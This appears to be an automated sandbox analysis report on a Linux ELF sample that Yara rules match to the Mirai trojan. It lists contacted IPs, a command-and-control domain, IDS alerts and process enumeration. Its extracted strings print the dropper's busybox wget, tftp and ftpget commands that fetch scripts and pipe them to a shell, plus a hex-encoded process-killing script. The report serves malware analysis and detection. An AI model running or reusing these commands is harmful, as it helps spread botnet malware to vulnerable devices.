2.139.30.114	unknown	Spain	3352	TELEFONICA_DE_ESPANAES	false
209.172.252.43	unknown	United States	393289	MERCERU-GA-ASNUS	false
108.74.98.78	unknown	United States	7018	ATT-INTERNET4US	false
29.0.125.212	unknown	United States	7922	COMCAST-7922US	false
72.96.114.77	unknown	United States	22394	CELLCOUS	false
140.64.124.58	unknown	United States	23700	FASTNET-AS-IDLinknet-FastnetASNID	false
110.105.167.94	unknown	China	9394	CTTNETChinaTieTongTelecommunicationsCorporationCN	false
142.5.15.102	unknown	Canada	46606	UNIFIEDLAYER-AS-1US	false
176.166.68.246	unknown	France	5410	BOUYGTEL-ISPFR	false
150.179.5.22	unknown	United States	3479	PEACHNET-AS1US	false
190.107.73.125	unknown	Ecuador	27902	GPFCORPORACION-POWERFASTEC	false
23.107.229.36	unknown	United States	395954	LEASEWEB-USA-LAX-11US	false
136.79.226.115	unknown	United States	60311	ONEFMCH	false
21.222.128.196	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
43.35.26.239	unknown	Japan	4249	LILLY-ASUS	false
23.48.63.151	unknown	United States	16625	AKAMAI-ASUS	false
188.126.222.137	unknown	Norway	41164	GET-NOGETNorwayNO	false
182.253.111.178	unknown	Indonesia	17451	BIZNET-AS-APBIZNETNETWORKSID	false
37.148.164.42	unknown	Netherlands	62370	SNELNL	false
90.230.68.3	unknown	Sweden	3301	TELIANET-SWEDENTeliaCompanySE	false
66.8.213.3	unknown	United States	20001	TWC-20001-PACWESTUS	false
67.128.250.123	unknown	United States	209	CENTURYLINK-US-LEGACY-QWESTUS	false
218.71.71.218	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
119.32.4.19	unknown	China	17622	CNCGROUP-GZChinaUnicomGuangzhounetworkCN	false
165.238.94.79	unknown	United States	3356	LEVEL3US	false
124.59.35.192	unknown	Korea Republic of	17858	POWERVIS-AS-KRLGPOWERCOMMKR	false
95.145.60.10	unknown	United Kingdom	12576	EELtdGB	false
138.61.193.227	unknown	United States	2611	BELNETBE	false
31.175.178.231	unknown	Poland	39603	P4NETP4UMTSoperatorinPolandPL	false
3.195.201.246	unknown	United States	16509	AMAZON-02US	false
214.201.113.48	unknown	United States	721	DNIC-ASBLK-00721-00726US	false
210.218.52.187	unknown	Korea Republic of	9531	GEDU-AS-KRGwangjuEducationResearchInformationServiceK	false
115.67.138.168	unknown	Thailand	10089	DTNCORP-TH-APTotalAccessCommunicationPLCTH	false
167.121.190.24	unknown	United States	10662	NORFOLK-SOUTHERNUS	false
64.217.87.82	unknown	United States	7018	ATT-INTERNET4US	false
102.164.141.163	unknown	Senegal	37649	TigoSN	false
92.113.213.64	unknown	Ukraine	6849	UKRTELNETUA	false
50.29.6.128	unknown	United States	6128	CABLE-NET-1US	false
125.10.26.12	unknown	Japan	9824	JTCL-JP-ASJupiterTelecommunicationCoLtdJP	false
19.113.76.234	unknown	United States	3	MIT-GATEWAYSUS	false
70.55.215.180	unknown	Canada	577	BACOMCA	false
199.238.2.219	unknown	United States	2914	NTT-COMMUNICATIONS-2914US	false
147.218.244.229	unknown	United States	1498	DNIC-ASBLK-01498-01499US	false
40.127.230.139	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
20.92.204.238	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
35.231.129.119	unknown	United States	15169	GOOGLEUS	false
188.2.197.83	unknown	Serbia	31042	SERBIA-BROADBAND-ASSerbiaBroadBand-SrpskeKablovskemreze	false
160.48.38.0	unknown	Germany	2381	WISCNET1-ASUS	false
137.95.37.249	unknown	United States	493	AFCONC-BLOCK1-ASUS	false
168.127.110.32	unknown	United States	16831	FUJITSUUS	false
153.117.26.95	unknown	United States	5501	FRAUNHOFER-CLUSTER-BWResearchInstitutesspreadalloverGe	false
24.136.239.25	unknown	United States	11426	TWC-11426-CAROLINASUS	false
213.149.148.141	unknown	Bulgaria	39184	ULTRANET-ASBG	false
206.151.212.211	unknown	United States	3561	CENTURYLINK-LEGACY-SAVVISUS	false
14.56.65.131	unknown	Korea Republic of	4766	KIXS-AS-KRKoreaTelecomKR	false
115.211.231.240	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
189.211.105.23	unknown	Mexico	6503	AxtelSABdeCVMX	false
47.110.97.152	unknown	China	37963	CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	false
84.83.58.102	unknown	Netherlands	1136	KPNKPNNationalEU	false
155.34.103.71	unknown	United States	24324	KORDIA-TRANSIT-AS-APKordiaLimitedNZ	false
9.139.112.62	unknown	United States	3356	LEVEL3US	false
135.68.150.40	unknown	United States	18676	AVAYAUS	false
145.188.155.114	unknown	Netherlands	59524	KPN-IAASNL	false
141.121.70.26	unknown	United States	6	BULL-HNUS	false
102.85.176.131	unknown	Uganda	37075	ZAINUGASUG	false
155.161.167.64	unknown	United States	7726	FITC-ASUS	false
45.40.237.75	unknown	China	45090	CNNIC-TENCENT-NET-APShenzhenTencentComputerSystemsCompa	false
99.40.245.223	unknown	United States	7018	ATT-INTERNET4US	false
189.215.217.227	unknown	Mexico	28509	CablemasTelecomunicacionesSAdeCVMX	false
89.160.178.106	unknown	Iceland	12969	VODAFONE_ICELANDIS	false
34.117.172.118	unknown	United States	139070	GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	false
28.47.248.3	unknown	United States	7922	COMCAST-7922US	false
107.179.162.139	unknown	Canada	5645	TEKSAVVYCA	false
167.163.139.80	unknown	United States	59447	SAYFANETTR	false
24.2.247.120	unknown	United States	7922	COMCAST-7922US	false
197.8.143.204	unknown	Tunisia	5438	ATI-TN	false
138.142.32.223	unknown	United States	721	DNIC-ASBLK-00721-00726US	false
129.192.94.145	unknown	United States	29518	BREDBAND2SE	false
198.102.122.231	unknown	United States	23339	MU-ASNUS	false
63.150.171.147	unknown	United States	6653	FORETHOUGHTNETUS	false
195.90.130.149	unknown	Russian Federation	6863	ROSNET-ASRU	false
170.165.80.36	unknown	Singapore	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
49.37.225.6	unknown	India	55836	RELIANCEJIO-INRelianceJioInfocommLimitedIN	false
91.139.32.95	unknown	Czech Republic	5588	GTSCEGTSCentralEuropeAntelGermanyCZ	false
78.236.83.125	unknown	France	12322	PROXADFR	false
189.241.215.78	unknown	Mexico	8151	UninetSAdeCVMX	false
203.123.218.189	unknown	Korea Republic of	17597	SAEROMNET-AS-KRTBROADSaeromNamdongSeohaebroadcastingKR	false
117.34.26.25	unknown	China	4835	CHINANET-IDC-SNChinaTelecomGroupCN	false
198.180.237.144	unknown	United States	11714	NETWORKNEBRASKAUS	false
131.154.145.175	unknown	Italy	137	ASGARRConsortiumGARREU	false
32.96.234.6	unknown	United States	2685	ATGS-MMD-ASUS	false
56.41.250.185	unknown	United States	2686	ATGS-MMD-ASUS	false
110.189.104.58	unknown	China	38283	CHINANET-SCIDC-AS-APCHINANETSiChuanTelecomInternetData	false
6.82.23.187	unknown	United States	3356	LEVEL3US	false
94.221.71.144	unknown	Germany	3209	VODANETInternationalIP-BackboneofVodafoneDE	false

Contacted Domains

Name	IP	Active
netfags.geek	204.76.203.103	true

AV Detection

Multi AV Scanner detection for submitted file

Source: fwkeLXlthW.elf	Virustotal: Detection: 37%			Perma Link
Source: fwkeLXlthW.elf	ReversingLabs: Detection: 57%

Machine Learning detection for sample

Source: fwkeLXlthW.elf

Joe Sandbox ML: detected

Found strings indicative of a multi-platform dropper

Source: fwkeLXlthW.elf	String: /bin/busyboxincorrectinvalidbadwrongfaildeniederrorretryenablelinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> >sh .k/bin/busybox wget http:///curl.sh -o- \| shGET /dlr. HTTP/1.0
Source: fwkeLXlthW.elf	String: .dThe People's/var//var/run//var/tmp//dev//dev/shm//etc//mnt//usr//boot//home/armarm5arm6arm7mipsmpslppcspcsh4/wget.sh -O- \| sh;/bin/busybox tftp -g -r tftp.sh -l- \| sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrep"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63""\x2F\x2A\x3B\x20\x64\x6F\x0A\x20\x20\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A""\x20\x20\x20\x20\x72\x65\x73\x75\x6C\x74\x3D\x24\x28\x6C\x73\x20\x2D\x6C\x20\x22\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x65""\x78\x65\x22\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x20\x20\x69\x66\x20\x5B\x20\x22\x24\x72\x65""\x73\x75\x6C\x74\x22\x20\x21\x3D\x20\x22\x24\x7B\x72\x65\x73\x75\x6C\x74\x25\x28\x64\x65\x6C\x65\x74\x65\x64\x29\x7D\x22\x20\x5D""\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x6B\x69\x6C\x6C\x20\x2D\x39\x20\x22\x24\x70\x69\x64\x22\x0A\x20\x20""\x20\x20\x66\x69\x0A\x64\x6F\x6E\x65\x0A"

Networking

Snort IDS alert for network traffic

Source: Traffic

Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:45894 -> 186.132.173.53:23

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 204.76.203.101 ports 38241,1,2,3,4,8

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.23:41498 -> 204.76.203.101:38241

Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)

Source: global traffic	TCP traffic: 192.168.2.23:39258 -> 34.249.145.219:443
Source: global traffic	TCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
Source: global traffic	TCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80

Source: unknown	TCP traffic detected without corresponding DNS query: 92.93.39.208
Source: unknown	TCP traffic detected without corresponding DNS query: 71.107.107.71
Source: unknown	TCP traffic detected without corresponding DNS query: 137.194.217.199
Source: unknown	TCP traffic detected without corresponding DNS query: 98.184.114.145
Source: unknown	TCP traffic detected without corresponding DNS query: 19.87.118.167
Source: unknown	TCP traffic detected without corresponding DNS query: 108.47.38.188
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.77.113
Source: unknown	TCP traffic detected without corresponding DNS query: 163.81.71.18
Source: unknown	TCP traffic detected without corresponding DNS query: 64.198.117.53
Source: unknown	TCP traffic detected without corresponding DNS query: 150.70.8.139
Source: unknown	TCP traffic detected without corresponding DNS query: 54.105.186.247
Source: unknown	TCP traffic detected without corresponding DNS query: 124.181.78.48
Source: unknown	TCP traffic detected without corresponding DNS query: 20.206.175.57
Source: unknown	TCP traffic detected without corresponding DNS query: 159.31.215.96
Source: unknown	TCP traffic detected without corresponding DNS query: 43.21.228.139
Source: unknown	TCP traffic detected without corresponding DNS query: 196.114.218.54
Source: unknown	TCP traffic detected without corresponding DNS query: 101.73.117.130
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.30.205
Source: unknown	TCP traffic detected without corresponding DNS query: 191.164.198.26
Source: unknown	TCP traffic detected without corresponding DNS query: 114.158.178.175
Source: unknown	TCP traffic detected without corresponding DNS query: 187.169.247.130
Source: unknown	TCP traffic detected without corresponding DNS query: 141.188.57.73
Source: unknown	TCP traffic detected without corresponding DNS query: 146.62.111.231
Source: unknown	TCP traffic detected without corresponding DNS query: 7.175.70.7
Source: unknown	TCP traffic detected without corresponding DNS query: 137.160.2.214
Source: unknown	TCP traffic detected without corresponding DNS query: 79.209.55.108
Source: unknown	TCP traffic detected without corresponding DNS query: 68.184.17.218
Source: unknown	TCP traffic detected without corresponding DNS query: 196.225.183.108
Source: unknown	TCP traffic detected without corresponding DNS query: 93.205.90.8
Source: unknown	TCP traffic detected without corresponding DNS query: 27.121.72.117
Source: unknown	TCP traffic detected without corresponding DNS query: 135.121.121.215
Source: unknown	TCP traffic detected without corresponding DNS query: 52.170.149.210
Source: unknown	TCP traffic detected without corresponding DNS query: 173.15.20.241
Source: unknown	TCP traffic detected without corresponding DNS query: 69.9.160.58
Source: unknown	TCP traffic detected without corresponding DNS query: 99.28.120.35
Source: unknown	TCP traffic detected without corresponding DNS query: 190.86.136.254
Source: unknown	TCP traffic detected without corresponding DNS query: 62.127.39.150
Source: unknown	TCP traffic detected without corresponding DNS query: 142.232.95.3
Source: unknown	TCP traffic detected without corresponding DNS query: 217.213.177.132
Source: unknown	TCP traffic detected without corresponding DNS query: 202.242.221.153
Source: unknown	TCP traffic detected without corresponding DNS query: 92.216.200.124
Source: unknown	TCP traffic detected without corresponding DNS query: 174.167.254.173
Source: unknown	TCP traffic detected without corresponding DNS query: 55.115.0.227
Source: unknown	TCP traffic detected without corresponding DNS query: 90.99.1.180
Source: unknown	TCP traffic detected without corresponding DNS query: 124.96.51.1
Source: unknown	TCP traffic detected without corresponding DNS query: 180.233.125.176
Source: unknown	TCP traffic detected without corresponding DNS query: 178.205.122.115
Source: unknown	TCP traffic detected without corresponding DNS query: 169.117.211.104
Source: unknown	TCP traffic detected without corresponding DNS query: 145.132.104.81
Source: unknown	TCP traffic detected without corresponding DNS query: 68.20.243.120

Source: global traffic

DNS traffic detected: DNS query: netfags.geek

Source: fwkeLXlthW.elf

String found in binary or memory: http:///curl.sh

Source: unknown	Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 39258 -> 443

System Summary

Malicious sample detected (through community Yara rule)

Source: fwkeLXlthW.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: fwkeLXlthW.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: fwkeLXlthW.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: fwkeLXlthW.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6256.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6256.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6256.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6256.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6254.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6254.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6254.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6254.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Source: Initial sample	String containing 'busybox' found: /bin/busybox
Source: Initial sample	String containing 'busybox' found: usage: busybox
Source: Initial sample	String containing 'busybox' found: /bin/busybox hostname PBOC
Source: Initial sample	String containing 'busybox' found: /bin/busybox echo >
Source: Initial sample	String containing 'busybox' found: /bin/busybox echo -ne
Source: Initial sample	String containing 'busybox' found: /bin/busybox wget http://
Source: Initial sample	String containing 'busybox' found: /wget.sh -O- \| sh;/bin/busybox tftp -g
Source: Initial sample	String containing 'busybox' found: -r tftp.sh -l- \| sh;/bin/busybox ftpget
Source: Initial sample	String containing 'busybox' found: /bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrep
Source: Initial sample	String containing 'busybox' found: /bin/busyboxincorrectinvalidbadwrongfaildeniederrorretryenablelinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> >sh .k/bin/busybox wget http:///curl.sh -o- \| shGET /dlr. HTTP/1.0
Source: Initial sample	String containing 'busybox' found: .dThe People's/var//var/run//var/tmp//dev//dev/shm//etc//mnt//usr//boot//home/armarm5arm6arm7mipsmpslppcspcsh4/wget.sh -O- \| sh;/bin/busybox tftp -g -r tftp.sh -l- \| sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrep"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63""\x2F\x2A\x3B\x20\x64\x6F\x0A\x20\x20\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A""\x20\x20\x20\x20\x72\x65\x73\x75\x6C\x74\x3D\x24\x28\x6C\x73\x20\x2D\x6C\x20\x22\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x65""\x78\x65\x22\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x20\x20\x69\x66\x20\x5B\x20\x22\x24\x72\x65""\x73\x75\x6C\x74\x22\x20\x21\x3D\x20\x22\x24\x7B\x72\x65\x73\x75\x6C\x74\x25\x28\x64\x65\x6C\x65\x74\x65\x64\x29\x7D\x22\x20\x5D""\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x6B\x69\x6C\x6C\x20\x

Sample has stripped symbol table

Source: ELF static info symbol of initial sample

.symtab present: no

Yara signature match

Source: fwkeLXlthW.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: fwkeLXlthW.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: fwkeLXlthW.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: fwkeLXlthW.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6256.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6256.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6256.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6256.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6254.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6254.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6254.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6254.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26

Source: classification engine

Classification label: mal72.troj.linELF@0/0@1/0

Enumerates processes within the "proc" file system

Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/4331/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/2033/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1582/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/2275/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1612/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1579/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1699/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1335/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1698/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/2028/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1334/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1576/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/2302/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/3236/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/2025/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/2146/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/912/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/759/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/2307/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/918/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/6087/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/6241/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1594/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/2285/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/2281/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1349/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1623/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/761/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1622/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/884/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1983/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/2038/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1586/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1465/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1344/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1860/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1463/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/2156/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/800/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/801/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1629/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/6239/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1627/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1900/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/491/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/2294/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/2050/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1877/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/772/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1633/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1599/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1632/status	Jump to behavior
